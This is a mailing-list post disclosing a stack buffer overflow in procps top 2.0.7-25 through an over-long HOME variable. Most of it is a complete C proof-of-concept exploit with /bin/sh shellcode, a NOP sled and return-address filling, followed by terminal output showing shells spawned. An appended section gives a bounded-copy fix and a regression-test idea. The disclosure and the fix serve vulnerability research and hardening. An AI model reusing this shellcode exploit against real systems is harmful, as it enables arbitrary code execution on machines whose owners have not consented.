Vulnerability Development mailing list archives

top (procps-2.0.7-25) vulnerability


From: WINNY THOMAS <winnymthomas () yahoo com>
Date: Fri, 6 May 2005 21:30:19 -0700 (PDT)

While running top on a tool of mine to do a profiling
test, the top command ran into a segmentation fault. I
could find two instances where the command could
misbehave:
 
1. if you have junk data inside a file .toprc in your home directory
2. if your environmental variable HOME is set to a string that's greater than 1024.
 
I managed to spawn a shell out of the top command by
exploiting the second issue. If you compile and run
the exploit code which I am including in the mail body
you will get a shell. In case you don't, you could pass
parameters to the program as follows to adjust the
offset.
The vulnerability detail is included in the code
comment.
 
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1001
sh-2.05b$ exit
exit
[winnythomas@r8 WinnyThomas]$ ./putshellcode 120
Illegal instruction
[winnythomas@r8 WinnyThomas]$ ./putshellcode 1010
sh-2.05b$ exit
exit
 
In most of the tests I did on the vulnerable code I got
a shell on my system without passing any parameter to
the program (that is, the hardcoded offset of 1111 in
my program worked well on my system).
 
/*
 * Program: Proof of concept code for top exploit
 * Author: Winny Thomas, Nevis networks pune
 * Vulnerability: in top.c the function get_options
 * uses strcpy to copy the value of the
 * environment variable HOME into a static buffer that
 * is allocated on the stack. Hence
 * it is possible to apply a standard stack smashing
 * attack to overwrite the return address
 * on the stack and execute code which is of the
 * attacker's choice.
 *      NOTE: top is not setuid and hence the exploit won't
 *      spawn a root shell.
 *      Tested on Red Hat 8 with procps version 2.0.7-25.
 *      The problem has
 *      been fixed in the latest versions.
 *
 * This code is for educational purpose only and the
 * author shall not bear any responsibility for any
 * damage caused by using this code
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen, strcat */
#include <unistd.h>     /* execl */

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

char exploit_variable[1200];

/* Return the current stack pointer (i386 only). */
long get_esp(void)
{
        long sp;
        __asm__("movl %%esp, %0" : "=r"(sp));
        return sp;
}

int main(int argc, char *argv[])
{
        long stackp, retaddr;
        char SETENV[1250];
        long *ptr;
        int i, j, offset = 1111;

        if (argc > 1)
            offset = atoi(argv[1]);

        stackp = get_esp();
        retaddr = stackp - offset;

        /* fill the whole buffer with the guessed return address */
        ptr = (long *)exploit_variable;
        for (i = 0; i < 1200; i += 4)
            *ptr++ = retaddr;

        /* NOP sled in the first half, followed by the payload */
        for (i = 0; i < 600; i++)
            exploit_variable[i] = '\x90';

        for (j = 0; j < strlen(shellcode); j++, i++)
            exploit_variable[i] = shellcode[j];

        /* hand the oversized value to top through HOME */
        sprintf(SETENV, "HOME=");
        strcat(SETENV, exploit_variable);
        putenv(SETENV);
        execl("/usr/bin/top", "top", (char *)0);
        perror("execl");
        return 1;
}
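The root cause described above is an unbounded strcpy of HOME into a fixed-size stack buffer. The following added example (not from the post or from procps) shows the bounded-copy pattern that closes that class of bug: the path is built only if it fits, and an over-long HOME is rejected instead of written past the buffer. The 1024-byte size and the "/.toprc" suffix are assumptions modelled on the post.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RCFILE_BUF 1024   /* assumed buffer size, matching the 1024 figure in the post */

/* Hardened stand-in for the described get_options() pattern (not top's actual code).
 * Builds "<home>/.toprc" into out[outsz] only if the result fits; returns 0 on
 * success and -1 on any input that would have overflowed a strcpy-based version. */
int build_rcfile_path(const char *home, char *out, size_t outsz)
{
    const char *suffix = "/.toprc";
    const char *nul;
    size_t hlen, slen;

    if (home == NULL || out == NULL || outsz == 0)
        return -1;

    /* Look for the terminator only within outsz bytes so an unterminated or
     * oversized value can never make us scan past the destination size. */
    nul = memchr(home, '\0', outsz);
    if (nul == NULL)
        return -1;
    hlen = (size_t)(nul - home);
    slen = strlen(suffix);

    /* Need hlen + slen + 1 bytes; fail closed rather than truncate silently. */
    if (hlen + slen + 1 > outsz)
        return -1;

    memcpy(out, home, hlen);
    memcpy(out + hlen, suffix, slen + 1);   /* copies the NUL too */
    return 0;
}

/* Mirrors the original flow: read HOME from the environment into a
 * RCFILE_BUF-sized stack buffer. Returns 0 if usable, -1 if HOME is absent
 * or too long, so the caller can fall back to defaults instead of crashing. */
int rcfile_from_env(void)
{
    char rcfile[RCFILE_BUF];
    if (build_rcfile_path(getenv("HOME"), rcfile, sizeof rcfile) != 0) {
        fprintf(stderr, "HOME missing or too long; ignoring .toprc\n");
        return -1;
    }
    printf("rcfile: %s\n", rcfile);
    return 0;
}
```

Running the same 1200-byte HOME value from the post against this version yields a clean -1 instead of a segmentation fault, which is also the simplest regression test to add for the original bug.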